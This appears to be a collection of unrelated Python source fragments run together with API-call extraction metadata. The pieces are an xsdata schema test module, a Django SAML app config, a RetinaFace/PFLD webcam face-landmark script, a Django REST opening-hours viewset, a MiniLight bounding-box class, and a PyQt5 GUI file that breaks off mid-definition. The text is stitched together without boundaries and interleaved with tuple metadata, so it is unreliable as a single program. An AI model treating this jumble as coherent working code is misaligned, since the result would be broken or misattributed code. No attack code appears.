[((25, 81), 'sys.path.insert', 'sys.path.insert', (['(0)', '"""/global/u1/s/spandey/kmeans_radec/"""'], {}), "(0, '/global/u1/s/spandey/kmeans_radec/')\n", (40, 81), False, 'import sys, platform, os\n'), ((640, 756), 'sys.path.insert', 'sys.path.insert', (['(0)', '"""/global/cfs/cdirs/des/shivamp/cosmosis/y3kp-bias-model/3d_stats/process_measure_data/"""'], {}), "(0,\n '/global/cfs/cdirs/des/shivamp/cosmosis/y3kp-bias-model/3d_stats/process_measure_data/'\n )\n", (655, 756), False, 'import sys, platform, os\n'), ((966, 985), 'nbodykit.lab.HDFCatalog', 'HDFCatalog', (['cat_str'], {}), '(cat_str)\n', (976, 985), False, 'from nbodykit.lab import HDFCatalog\n'), ((1372, 1405), 'numpy.sum', 'np.sum', (['(prob_zcent * zcent * delz)'], {}), '(prob_zcent * zcent * delz)\n', (1378, 1405), True, 'import numpy as np\n'), ((1404, 1429), 'numpy.sum', 'np.sum', (['(prob_zcent * delz)'], {}), '(prob_zcent * delz)\n', (1410, 1429), True, 'import numpy as np\n')]
import os from pathlib import Path from click.testing import CliRunner from tests.conftest import load_class from tests.conftest import validate_bindings from xsdata import cli os.chdir(Path(__file__).parent.parent.parent) def test_integration(): schema = Path("tests/fixtures/defxmlschema/chapter12/chapter12.xsd") package = "tests.fixtures.defxmlschema.chapter12" runner = CliRunner() result = runner.invoke(cli, [str(schema), "--package", package]) if result.exception: raise result.exception clazz = load_class(result.output, "Items") validate_bindings(schema, clazz) def test_example1202(): schema = "tests/fixtures/defxmlschema/chapter12/example1202.xsd" package = "tests.fixtures.defxmlschema.chapter12" runner = CliRunner() result = runner.invoke(cli, [schema, "--package", package]) if result.exception: raise result.exception def test_example1203(): schema = "tests/fixtures/defxmlschema/chapter12/example1203.xsd" package = "tests.fixtures.defxmlschema.chapter12" runner = CliRunner() result = runner.invoke(cli, [schema, "--package", package]) if result.exception: raise result.exception def test_example1205(): schema = "tests/fixtures/defxmlschema/chapter12/example1205.xsd" package = "tests.fixtures.defxmlschema.chapter12" runner = CliRunner() result = runner.invoke(cli, [schema, "--package", package]) if result.exception: raise result.exception def test_example1207(): schema = "tests/fixtures/defxmlschema/chapter12/example1207.xsd" package = "tests.fixtures.defxmlschema.chapter12" runner = CliRunner() result = runner.invoke(cli, [schema, "--package", package]) if result.exception: raise result.exception def test_example1209(): schema = "tests/fixtures/defxmlschema/chapter12/example1209.xsd" package = "tests.fixtures.defxmlschema.chapter12" runner = CliRunner() result = runner.invoke(cli, [schema, "--package", package]) if result.exception: raise result.exception def test_example1211(): schema = "tests/fixtures/defxmlschema/chapter12/example1211.xsd" package = "tests.fixtures.defxmlschema.chapter12" runner = CliRunner() result = runner.invoke(cli, [schema, "--package", package]) if result.exception: raise result.exception def test_example1212(): schema = "tests/fixtures/defxmlschema/chapter12/example1212.xsd" package = "tests.fixtures.defxmlschema.chapter12" runner = CliRunner() result = runner.invoke(cli, [schema, "--package", package]) if result.exception: raise result.exception def test_example1213(): schema = "tests/fixtures/defxmlschema/chapter12/example1213.xsd" package = "tests.fixtures.defxmlschema.chapter12" runner = CliRunner() result = runner.invoke(cli, [schema, "--package", package]) if result.exception: raise result.exception def test_example1215(): schema = "tests/fixtures/defxmlschema/chapter12/example1215.xsd" package = "tests.fixtures.defxmlschema.chapter12" runner = CliRunner() result = runner.invoke(cli, [schema, "--package", package]) if result.exception: raise result.exception def test_example1218(): schema = "tests/fixtures/defxmlschema/chapter12/example1218.xsd" package = "tests.fixtures.defxmlschema.chapter12" runner = CliRunner() result = runner.invoke(cli, [schema, "--package", package]) if result.exception: raise result.exception def test_example1219(): schema = "tests/fixtures/defxmlschema/chapter12/example1219.xsd" package = "tests.fixtures.defxmlschema.chapter12" runner = CliRunner() result = runner.invoke(cli, [schema, "--package", package]) if result.exception: raise result.exception def test_example1221(): schema = "tests/fixtures/defxmlschema/chapter12/example1221.xsd" package = "tests.fixtures.defxmlschema.chapter12" runner = CliRunner() result = runner.invoke(cli, [schema, "--package", package]) if result.exception: raise result.exception def test_example1223(): schema = "tests/fixtures/defxmlschema/chapter12/example1223.xsd" package = "tests.fixtures.defxmlschema.chapter12" runner = CliRunner() result = runner.invoke(cli, [schema, "--package", package]) if result.exception: raise result.exception def test_example1224(): schema = "tests/fixtures/defxmlschema/chapter12/example1224.xsd" package = "tests.fixtures.defxmlschema.chapter12" runner = CliRunner() result = runner.invoke(cli, [schema, "--package", package]) if result.exception: raise result.exception def test_example1227(): schema = "tests/fixtures/defxmlschema/chapter12/example1227.xsd" package = "tests.fixtures.defxmlschema.chapter12" runner = CliRunner() result = runner.invoke(cli, [schema, "--package", package]) if result.exception: raise result.exception def test_example1229(): schema = "tests/fixtures/defxmlschema/chapter12/example1229.xsd" package = "tests.fixtures.defxmlschema.chapter12" runner = CliRunner() result = runner.invoke(cli, [schema, "--package", package]) if result.exception: raise result.exception def test_example1230(): schema = "tests/fixtures/defxmlschema/chapter12/example1230.xsd" package = "tests.fixtures.defxmlschema.chapter12" runner = CliRunner() result = runner.invoke(cli, [schema, "--package", package]) if result.exception: raise result.exception def test_example1231(): schema = "tests/fixtures/defxmlschema/chapter12/example1231.xsd" package = "tests.fixtures.defxmlschema.chapter12" runner = CliRunner() result = runner.invoke(cli, [schema, "--package", package]) if result.exception: raise result.exception def test_example1232(): schema = "tests/fixtures/defxmlschema/chapter12/example1232.xsd" package = "tests.fixtures.defxmlschema.chapter12" runner = CliRunner() result = runner.invoke(cli, [schema, "--package", package]) if result.exception: raise result.exception def test_example1233(): schema = "tests/fixtures/defxmlschema/chapter12/example1233.xsd" package = "tests.fixtures.defxmlschema.chapter12" runner = CliRunner() result = runner.invoke(cli, [schema, "--package", package]) if result.exception: raise result.exception def test_example1235(): schema = "tests/fixtures/defxmlschema/chapter12/example1235.xsd" package = "tests.fixtures.defxmlschema.chapter12" runner = CliRunner() result = runner.invoke(cli, [schema, "--package", package]) if result.exception: raise result.exception def test_example1237(): schema = "tests/fixtures/defxmlschema/chapter12/example1237.xsd" package = "tests.fixtures.defxmlschema.chapter12" runner = CliRunner() result = runner.invoke(cli, [schema, "--package", package]) if result.exception: raise result.exception def test_example1240(): schema = "tests/fixtures/defxmlschema/chapter12/example1240.xsd" package = "tests.fixtures.defxmlschema.chapter12" runner = CliRunner() result = runner.invoke(cli, [schema, "--package", package]) if result.exception: raise result.exception def test_example1242(): schema = "tests/fixtures/defxmlschema/chapter12/example1242.xsd" package = "tests.fixtures.defxmlschema.chapter12" runner = CliRunner() result = runner.invoke(cli, [schema, "--package", package]) if result.exception: raise result.exception def test_example1244(): schema = "tests/fixtures/defxmlschema/chapter12/example1244.xsd" package = "tests.fixtures.defxmlschema.chapter12" runner = CliRunner() result = runner.invoke(cli, [schema, "--package", package]) if result.exception: raise result.exception def test_example1246(): schema = "tests/fixtures/defxmlschema/chapter12/example1246.xsd" package = "tests.fixtures.defxmlschema.chapter12" runner = CliRunner() result = runner.invoke(cli, [schema, "--package", package]) if result.exception: raise result.exception def test_example1247(): schema = "tests/fixtures/defxmlschema/chapter12/example1247.xsd" package = "tests.fixtures.defxmlschema.chapter12" runner = CliRunner() result = runner.invoke(cli, [schema, "--package", package]) if result.exception: raise result.exception
[ "tests.conftest.validate_bindings", "tests.conftest.load_class", "click.testing.CliRunner", "pathlib.Path" ]
[((266, 325), 'pathlib.Path', 'Path', (['"""tests/fixtures/defxmlschema/chapter12/chapter12.xsd"""'], {}), "('tests/fixtures/defxmlschema/chapter12/chapter12.xsd')\n", (270, 325), False, 'from pathlib import Path\n'), ((393, 404), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (402, 404), False, 'from click.testing import CliRunner\n'), ((544, 578), 'tests.conftest.load_class', 'load_class', (['result.output', '"""Items"""'], {}), "(result.output, 'Items')\n", (554, 578), False, 'from tests.conftest import load_class\n'), ((583, 615), 'tests.conftest.validate_bindings', 'validate_bindings', (['schema', 'clazz'], {}), '(schema, clazz)\n', (600, 615), False, 'from tests.conftest import validate_bindings\n'), ((778, 789), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (787, 789), False, 'from click.testing import CliRunner\n'), ((1073, 1084), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (1082, 1084), False, 'from click.testing import CliRunner\n'), ((1368, 1379), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (1377, 1379), False, 'from click.testing import CliRunner\n'), ((1663, 1674), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (1672, 1674), False, 'from click.testing import CliRunner\n'), ((1958, 1969), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (1967, 1969), False, 'from click.testing import CliRunner\n'), ((2253, 2264), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (2262, 2264), False, 'from click.testing import CliRunner\n'), ((2548, 2559), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (2557, 2559), False, 'from click.testing import CliRunner\n'), ((2843, 2854), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (2852, 2854), False, 'from click.testing import CliRunner\n'), ((3138, 3149), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (3147, 3149), False, 'from click.testing import CliRunner\n'), ((3433, 3444), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (3442, 3444), False, 'from click.testing import CliRunner\n'), ((3728, 3739), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (3737, 3739), False, 'from click.testing import CliRunner\n'), ((4023, 4034), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (4032, 4034), False, 'from click.testing import CliRunner\n'), ((4318, 4329), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (4327, 4329), False, 'from click.testing import CliRunner\n'), ((4613, 4624), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (4622, 4624), False, 'from click.testing import CliRunner\n'), ((4908, 4919), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (4917, 4919), False, 'from click.testing import CliRunner\n'), ((5203, 5214), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (5212, 5214), False, 'from click.testing import CliRunner\n'), ((5498, 5509), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (5507, 5509), False, 'from click.testing import CliRunner\n'), ((5793, 5804), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (5802, 5804), False, 'from click.testing import CliRunner\n'), ((6088, 6099), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (6097, 6099), False, 'from click.testing import CliRunner\n'), ((6383, 6394), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (6392, 6394), False, 'from click.testing import CliRunner\n'), ((6678, 6689), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (6687, 6689), False, 'from click.testing import CliRunner\n'), ((6973, 6984), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (6982, 6984), False, 'from click.testing import CliRunner\n'), ((7268, 7279), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (7277, 7279), False, 'from click.testing import CliRunner\n'), ((7563, 7574), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (7572, 7574), False, 'from click.testing import CliRunner\n'), ((7858, 7869), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (7867, 7869), False, 'from click.testing import CliRunner\n'), ((8153, 8164), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (8162, 8164), False, 'from click.testing import CliRunner\n'), ((8448, 8459), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (8457, 8459), False, 'from click.testing import CliRunner\n'), ((189, 203), 'pathlib.Path', 'Path', (['__file__'], {}), '(__file__)\n', (193, 203), False, 'from pathlib import Path\n')]
import os import sys from django.apps import AppConfig from . import ( __description__, __license__, __url__, __verbose_name__, __version__, ) from .exceptions import SamlException class SamlAppConfig(AppConfig): name = 'openslides_saml' verbose_name = __verbose_name__ description = __description__ version = __version__ license = __license__ url = __url__ angular_site_module = True js_files = [ 'static/js/openslides_saml/base.js', 'static/js/openslides_saml/site.js', ] def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) try: import onelogin.saml2 # noqa except ImportError: raise SamlException('Could not import onelogin.saml2. Is python-saml3 installed?') def ready(self): # Import all required stuff. from django.conf import settings from .urls import urlpatterns from .settings import SamlSettings try: settings_dir = os.path.dirname(os.path.abspath(settings.SETTINGS_FILEPATH)) except AttributeError: raise SamlException( "'SETTINGS_FILEPATH' is not in your settings.py. " + "Would you kindly add the following line: 'SETTINGS_FILEPATH = __file__'?") # Instanciate the SamlSettings, if the worker is run normally. Here, # the class is loaded the first time and by providing the settings_path # the internal state is set to this path. if sys.argv[1] != 'create-saml-settings': SamlSettings(settings_dir) # Make the urls available for openslides self.urlpatterns = urlpatterns def get_angular_constants(self): from .settings import SamlSettings saml_settings = { 'name': 'SAMLSettings', 'value': SamlSettings.get_general_settings()} return [saml_settings]
[ "os.path.abspath" ]
[((1051, 1094), 'os.path.abspath', 'os.path.abspath', (['settings.SETTINGS_FILEPATH'], {}), '(settings.SETTINGS_FILEPATH)\n', (1066, 1094), False, 'import os\n')]
import tensorflow as tf k = tf.keras import numpy as np import cv2 from scipy.special import softmax, expit import sys import os sys.path.insert(0, os.getcwd()) from retinaface_camera import get_anchors, nms_oneclass, decode_bbox, decode_landm def detect_face(retinaface_model: k.Model, pfld_model: k.Model, anchors: np.ndarray, draw_img: np.ndarray, obj_thresh=0.7, nms_threshold=0.4, variances=[0.1, 0.2]): """ resize """ img = cv2.cvtColor(draw_img, cv2.COLOR_BGR2RGB) """ normlize """ det_img = ((img / 255. - 0.5) / 1)[None, ...] """ infer """ predictions = retinaface_model.predict(det_img) """ parser """ bbox, landm, clses = np.split(predictions[0], [4, -2], 1) """ softmax class""" clses = softmax(clses, -1) score = clses[:, 1] """ decode """ bbox = decode_bbox(bbox, anchors, variances) bbox = bbox * np.tile([640, 640], [2]) """ filter low score """ inds = np.where(score > obj_thresh)[0] bbox = bbox[inds] score = score[inds] """ keep top-k before NMS """ order = np.argsort(score)[::-1] bbox = bbox[order] score = score[order] """ do nms """ keep = nms_oneclass(bbox, score, nms_threshold) for b, s in zip(bbox[keep].astype(int), score[keep]): cv2.rectangle(draw_img, tuple(b[:2]), tuple(b[2:]), (255, 0, 0), 2) cx, cy = (b[:2] + b[2:]) // 2 halfw = np.max(b[2:] - b[:2]) // 2 croped_img: np.ndarray = img[cy - halfw:cy + halfw, cx - halfw:cx + halfw] croped_wh = croped_img.shape[1::-1] if croped_wh[0] == croped_wh[1] and min(croped_wh) > 10: croped_img = cv2.resize(croped_img, (112, 112)) croped_img = ((croped_img / 255. - 0.5) / 1)[None, ...] landmarks = pfld_model.predict(croped_img) s_point = np.array([cx - halfw, cy - halfw]) for landm in np.reshape(expit(landmarks), (-1, 2)) * croped_wh: cv2.circle(draw_img, tuple((s_point + landm).astype(int)), 1, (0, 255, 0)) return draw_img if __name__ == "__main__": physical_devices = tf.config.experimental.list_physical_devices('GPU') assert len(physical_devices) > 0, "Not enough GPU hardware devices available" tf.config.experimental.set_memory_growth(physical_devices[0], True) retinaface_model: k.Model = k.models.load_model('asset/retinaface_train.h5') anchors = get_anchors([640, 640], [[0.025, 0.05], [0.1, 0.2], [0.4, 0.8]], [8, 16, 32]) pfld_model: k.Model = k.models.load_model('asset/pfld_infer.h5') capture = cv2.VideoCapture(0) capture.set(cv2.CAP_PROP_FRAME_WIDTH, 640) capture.set(cv2.CAP_PROP_FRAME_HEIGHT, 480) while (True): ret, img = capture.read() # img = cv2.flip(img, 1) img = cv2.copyMakeBorder(img, 80, 80, 0, 0, cv2.BORDER_CONSTANT, value=0) draw_img = detect_face(retinaface_model, pfld_model, anchors, img) cv2.imshow('frame', draw_img) if cv2.waitKey(1) == ord('q'): break
[ "cv2.imshow", "numpy.argsort", "numpy.array", "numpy.where", "numpy.max", "cv2.waitKey", "numpy.tile", "scipy.special.softmax", "scipy.special.expit", "cv2.cvtColor", "retinaface_camera.nms_oneclass", "cv2.resize", "tensorflow.config.experimental.set_memory_growth", "cv2.copyMakeBorder", "os.getcwd", "retinaface_camera.decode_bbox", "numpy.split", "cv2.VideoCapture", "retinaface_camera.get_anchors", "tensorflow.config.experimental.list_physical_devices" ]
[((148, 159), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (157, 159), False, 'import os\n'), ((532, 573), 'cv2.cvtColor', 'cv2.cvtColor', (['draw_img', 'cv2.COLOR_BGR2RGB'], {}), '(draw_img, cv2.COLOR_BGR2RGB)\n', (544, 573), False, 'import cv2\n'), ((747, 783), 'numpy.split', 'np.split', (['predictions[0]', '[4, -2]', '(1)'], {}), '(predictions[0], [4, -2], 1)\n', (755, 783), True, 'import numpy as np\n'), ((817, 835), 'scipy.special.softmax', 'softmax', (['clses', '(-1)'], {}), '(clses, -1)\n', (824, 835), False, 'from scipy.special import softmax, expit\n'), ((884, 921), 'retinaface_camera.decode_bbox', 'decode_bbox', (['bbox', 'anchors', 'variances'], {}), '(bbox, anchors, variances)\n', (895, 921), False, 'from retinaface_camera import get_anchors, nms_oneclass, decode_bbox, decode_landm\n'), ((1209, 1249), 'retinaface_camera.nms_oneclass', 'nms_oneclass', (['bbox', 'score', 'nms_threshold'], {}), '(bbox, score, nms_threshold)\n', (1221, 1249), False, 'from retinaface_camera import get_anchors, nms_oneclass, decode_bbox, decode_landm\n'), ((2070, 2121), 'tensorflow.config.experimental.list_physical_devices', 'tf.config.experimental.list_physical_devices', (['"""GPU"""'], {}), "('GPU')\n", (2114, 2121), True, 'import tensorflow as tf\n'), ((2204, 2271), 'tensorflow.config.experimental.set_memory_growth', 'tf.config.experimental.set_memory_growth', (['physical_devices[0]', '(True)'], {}), '(physical_devices[0], True)\n', (2244, 2271), True, 'import tensorflow as tf\n'), ((2363, 2440), 'retinaface_camera.get_anchors', 'get_anchors', (['[640, 640]', '[[0.025, 0.05], [0.1, 0.2], [0.4, 0.8]]', '[8, 16, 32]'], {}), '([640, 640], [[0.025, 0.05], [0.1, 0.2], [0.4, 0.8]], [8, 16, 32])\n', (2374, 2440), False, 'from retinaface_camera import get_anchors, nms_oneclass, decode_bbox, decode_landm\n'), ((2545, 2564), 'cv2.VideoCapture', 'cv2.VideoCapture', (['(0)'], {}), '(0)\n', (2561, 2564), False, 'import cv2\n'), ((938, 962), 'numpy.tile', 'np.tile', (['[640, 640]', '[2]'], {}), '([640, 640], [2])\n', (945, 962), True, 'import numpy as np\n'), ((999, 1027), 'numpy.where', 'np.where', (['(score > obj_thresh)'], {}), '(score > obj_thresh)\n', (1007, 1027), True, 'import numpy as np\n'), ((1115, 1132), 'numpy.argsort', 'np.argsort', (['score'], {}), '(score)\n', (1125, 1132), True, 'import numpy as np\n'), ((2741, 2808), 'cv2.copyMakeBorder', 'cv2.copyMakeBorder', (['img', '(80)', '(80)', '(0)', '(0)', 'cv2.BORDER_CONSTANT'], {'value': '(0)'}), '(img, 80, 80, 0, 0, cv2.BORDER_CONSTANT, value=0)\n', (2759, 2808), False, 'import cv2\n'), ((2884, 2913), 'cv2.imshow', 'cv2.imshow', (['"""frame"""', 'draw_img'], {}), "('frame', draw_img)\n", (2894, 2913), False, 'import cv2\n'), ((1425, 1446), 'numpy.max', 'np.max', (['(b[2:] - b[:2])'], {}), '(b[2:] - b[:2])\n', (1431, 1446), True, 'import numpy as np\n'), ((1651, 1685), 'cv2.resize', 'cv2.resize', (['croped_img', '(112, 112)'], {}), '(croped_img, (112, 112))\n', (1661, 1685), False, 'import cv2\n'), ((1813, 1847), 'numpy.array', 'np.array', (['[cx - halfw, cy - halfw]'], {}), '([cx - halfw, cy - halfw])\n', (1821, 1847), True, 'import numpy as np\n'), ((2921, 2935), 'cv2.waitKey', 'cv2.waitKey', (['(1)'], {}), '(1)\n', (2932, 2935), False, 'import cv2\n'), ((1878, 1894), 'scipy.special.expit', 'expit', (['landmarks'], {}), '(landmarks)\n', (1883, 1894), False, 'from scipy.special import softmax, expit\n')]
from django.utils.datetime_safe import datetime from rest_framework import serializers, viewsets from rest_framework.response import Response from opening_hours.hours import get_opening_hours from reservation_units.models import ReservationUnit class OpeningHours(object): def __init__(self, id: int, start_date: datetime, end_date: datetime): self.id = id self.opening_hours = self.get_hours(start_date, end_date) def get_hours(self, start_date: datetime, end_date: datetime): return get_opening_hours( resource_id=f"{self.id}", start_date=start_date, end_date=end_date, ) class OpenTimeSerializer(serializers.Serializer): start_time = serializers.TimeField(read_only=True) end_time = serializers.TimeField(read_only=True) end_time_on_next_day = serializers.BooleanField(read_only=True) class OpeningHourDateSerialiser(serializers.Serializer): date = serializers.DateField(read_only=True) times = OpenTimeSerializer(read_only=True, many=True) class OpeningHoursSerializer(serializers.Serializer): id = serializers.IntegerField(read_only=True) opening_hours = OpeningHourDateSerialiser(read_only=True, many=True) class OpeningHoursViewSet(viewsets.ViewSet): serializer_class = OpeningHoursSerializer def retrieve(self, request, pk=None): start_date = self.request.query_params.get("start_date") end_date = self.request.query_params.get("end_date") unit = ReservationUnit.objects.get(pk=pk) return Response( OpeningHoursSerializer( instance=OpeningHours( id=unit.id, start_date=start_date, end_date=end_date ) ).data )
[ "rest_framework.serializers.IntegerField", "rest_framework.serializers.BooleanField", "rest_framework.serializers.DateField", "rest_framework.serializers.TimeField", "opening_hours.hours.get_opening_hours", "reservation_units.models.ReservationUnit.objects.get" ]
[((723, 760), 'rest_framework.serializers.TimeField', 'serializers.TimeField', ([], {'read_only': '(True)'}), '(read_only=True)\n', (744, 760), False, 'from rest_framework import serializers, viewsets\n'), ((776, 813), 'rest_framework.serializers.TimeField', 'serializers.TimeField', ([], {'read_only': '(True)'}), '(read_only=True)\n', (797, 813), False, 'from rest_framework import serializers, viewsets\n'), ((841, 881), 'rest_framework.serializers.BooleanField', 'serializers.BooleanField', ([], {'read_only': '(True)'}), '(read_only=True)\n', (865, 881), False, 'from rest_framework import serializers, viewsets\n'), ((952, 989), 'rest_framework.serializers.DateField', 'serializers.DateField', ([], {'read_only': '(True)'}), '(read_only=True)\n', (973, 989), False, 'from rest_framework import serializers, viewsets\n'), ((1113, 1153), 'rest_framework.serializers.IntegerField', 'serializers.IntegerField', ([], {'read_only': '(True)'}), '(read_only=True)\n', (1137, 1153), False, 'from rest_framework import serializers, viewsets\n'), ((521, 611), 'opening_hours.hours.get_opening_hours', 'get_opening_hours', ([], {'resource_id': 'f"""{self.id}"""', 'start_date': 'start_date', 'end_date': 'end_date'}), "(resource_id=f'{self.id}', start_date=start_date, end_date\n =end_date)\n", (538, 611), False, 'from opening_hours.hours import get_opening_hours\n'), ((1504, 1538), 'reservation_units.models.ReservationUnit.objects.get', 'ReservationUnit.objects.get', ([], {'pk': 'pk'}), '(pk=pk)\n', (1531, 1538), False, 'from reservation_units.models import ReservationUnit\n')]
# MiniLight Python : minimal global illumination renderer # # Copyright (c) 2007-2008, <NAME> / HXA7241 and <NAME>. # http://www.hxa7241.org/ # # Copyright (c) 2009-2012, <NAME>. from vector3f import Vector3f, MAX class Bound(object): def __init__(self, lower, upper): self.lower = lower self.upper = upper def expand_to_fit(self, bound): for j in range(3): if self.lower[j] > bound.lower[j]: self.lower[j] = bound.lower[j] if self.upper[j] < bound.upper[j]: self.upper[j] = bound.upper[j] def clamp(self): size = max(list(Vector3f(self.upper) - Vector3f(self.lower))) self.upper = list(Vector3f(self.upper).clamped( Vector3f(self.lower) + Vector3f(size), MAX)) def encloses(self, bound): return ( bound.upper[0] >= self.lower[0] and bound.lower[0] < self.upper[0] and bound.upper[1] >= self.lower[1] and bound.lower[1] < self.upper[1] and bound.upper[2] >= self.lower[2] and bound.lower[2] < self.upper[2] ) def within(self, point, tolerance): return ( (self.lower[0] - point[0] <= tolerance) and (point[0] - self.upper[0] <= tolerance) and (self.lower[1] - point[1] <= tolerance) and (point[1] - self.upper[1] <= tolerance) and (self.lower[2] - point[2] <= tolerance) and (point[2] - self.upper[2] <= tolerance) )
[ "vector3f.Vector3f" ]
[((634, 654), 'vector3f.Vector3f', 'Vector3f', (['self.upper'], {}), '(self.upper)\n', (642, 654), False, 'from vector3f import Vector3f, MAX\n'), ((657, 677), 'vector3f.Vector3f', 'Vector3f', (['self.lower'], {}), '(self.lower)\n', (665, 677), False, 'from vector3f import Vector3f, MAX\n'), ((706, 726), 'vector3f.Vector3f', 'Vector3f', (['self.upper'], {}), '(self.upper)\n', (714, 726), False, 'from vector3f import Vector3f, MAX\n'), ((748, 768), 'vector3f.Vector3f', 'Vector3f', (['self.lower'], {}), '(self.lower)\n', (756, 768), False, 'from vector3f import Vector3f, MAX\n'), ((771, 785), 'vector3f.Vector3f', 'Vector3f', (['size'], {}), '(size)\n', (779, 785), False, 'from vector3f import Vector3f, MAX\n')]
# -*- coding: utf-8 -*- # Form implementation generated from reading ui file 'gui.ui' # # Created by: PyQt5 UI code generator 5.15.4 # # WARNING: Any manual changes made to this file will be lost when pyuic5 is # run again. Do not edit this file unless you know what you are doing. from PyQt5 import QtCore, QtGui, QtWidgets import os import socket import time import port_forward_3 #from fsplit.filesplit import Filesplit #fs=Filesplit() class Ui_MainWindow(object): def setupUi(self, MainWindow): MainWindow.setObjectName("MainWindow") MainWindow.resize(425, 455) MainWindow.setAcceptDrops(True) MainWindow.setAutoFillBackground(False) self.centralwidget = QtWidgets.QWidget(MainWindow) self.centralwidget.setObjectName("centralwidget") self.pushButton = QtWidgets.QPushButton(self.centralwidget) self.pushButton.setGeometry(QtCore.QRect(310, 129, 91, 73)) self.pushButton.setObjectName("pushButton") self.textEdit = QtWidgets.QTextEdit(self.centralwidget) self.textEdit.setGeometry(QtCore.QRect(30, 130, 281, 71)) self.textEdit.setObjectName("textEdit") self.label_4 = QtWidgets.QLabel(self.centralwidget) self.label_4.setGeometry(QtCore.QRect(32, 26, 131, 16)) font = QtGui.QFont() font.setFamily("MS Reference Sans Serif") font.setPointSize(15) self.label_4.setFont(font) self.label_4.setObjectName("label_4") self.label_5 = QtWidgets.QLabel(self.centralwidget) self.label_5.setGeometry(QtCore.QRect(32, 113, 220, 13)) self.label_5.setObjectName("label_5") self.label_6 = QtWidgets.QLabel(self.centralwidget) self.label_6.setGeometry(QtCore.QRect(32, 6, 131, 16)) font = QtGui.QFont() font.setFamily("MS Reference Sans Serif") font.setPointSize(15) self.label_6.setFont(font) self.label_6.setObjectName("label_6") self.label_7 = QtWidgets.QLabel(self.centralwidget) self.label_7.setGeometry(QtCore.QRect(32, 212, 131, 16)) font = QtGui.QFont() font.setFamily("MS Reference Sans Serif") font.setPointSize(15) self.label_7.setFont(font) self.label_7.setObjectName("label_7") self.label_8 = QtWidgets.QLabel(self.centralwidget) self.label_8.setGeometry(QtCore.QRect(32, 236, 131, 16)) font = QtGui.QFont() font.setFamily("MS Reference Sans Serif") font.setPointSize(15) self.label_8.setFont(font) self.label_8.setObjectName("label_8") self.label_9 = QtWidgets.QLabel(self.centralwidget) self.label_9.setGeometry(QtCore.QRect(32, 284, 381, 20)) font = QtGui.QFont() font.setFamily("MS Reference Sans Serif") font.setPointSize(10) self.label_9.setFont(font) self.label_9.setObjectName("label_9") self.label_10 = QtWidgets.QLabel(self.centralwidget) self.label_10.setGeometry(QtCore.QRect(32, 269, 381, 20)) font = QtGui.QFont() font.setFamily("MS Reference Sans Serif") font.setPointSize(10) self.label_10.setFont(font) self.label_10.setObjectName("label_10") self.label_11 = QtWidgets.QLabel(self.centralwidget) self.label_11.setGeometry(QtCore.QRect(32, 248, 480, 31)) font = QtGui.QFont() font.setFamily("MS Reference Sans Serif") font.setPointSize(10) self.label_11.setFont(font) self.label_11.setObjectName("label_11") self.label_12 = QtWidgets.QLabel(self.centralwidget) self.label_12.setGeometry(QtCore.QRect(32, 327, 47, 13)) self.label_12.setObjectName("label_12") self.lineEdit = QtWidgets.QLineEdit(self.centralwidget) self.lineEdit.setGeometry(QtCore.QRect(87, 324, 113, 20)) self.lineEdit.setObjectName("lineEdit") self.lineEdit_2 = QtWidgets.QLineEdit(self.centralwidget) self.lineEdit_2.setGeometry(QtCore.QRect(87, 352, 113, 20)) self.lineEdit_2.setObjectName("lineEdit_2") self.label_13 = QtWidgets.QLabel(self.centralwidget) self.label_13.setGeometry(QtCore.QRect(32, 354, 47, 13)) self.label_13.setObjectName("label_13") self.lineEdit_3 = QtWidgets.QLineEdit(self.centralwidget) self.lineEdit_3.setGeometry(QtCore.QRect(87, 380, 113, 20)) self.lineEdit_3.setObjectName("lineEdit_3") self.label_14 = QtWidgets.QLabel(self.centralwidget) self.label_14.setGeometry(QtCore.QRect(32, 380, 51, 16)) self.label_14.setObjectName("label_14") self.pushButton_2 = QtWidgets.QPushButton(self.centralwidget) self.pushButton_2.setGeometry(QtCore.QRect(230, 322, 101, 81)) self.pushButton_2.setObjectName("pushButton_2") self.label = QtWidgets.QLabel(self.centralwidget) self.label.setGeometry(QtCore.QRect(32, 32, 371, 41)) font = QtGui.QFont() font.setFamily("MS Reference Sans Serif") font.setPointSize(10) font.setItalic(False) self.label.setFont(font) self.label.setObjectName("label") self.label_2 = QtWidgets.QLabel(self.centralwidget) self.label_2.setGeometry(QtCore.QRect(32, 62, 291, 41)) font = QtGui.QFont() font.setFamily("MS Reference Sans Serif") font.setPointSize(10) font.setItalic(False) self.label_2.setFont(font) self.label_2.setObjectName("label_2") self.lineEdit_4 = QtWidgets.QLineEdit(self.centralwidget) self.lineEdit_4.setGeometry(QtCore.QRect(79, 91, 113, 20)) self.lineEdit_4.setObjectName("lineEdit_4") self.label_3 = QtWidgets.QLabel(self.centralwidget) self.label_3.setGeometry(QtCore.QRect(32, 48, 371, 41)) font = QtGui.QFont() 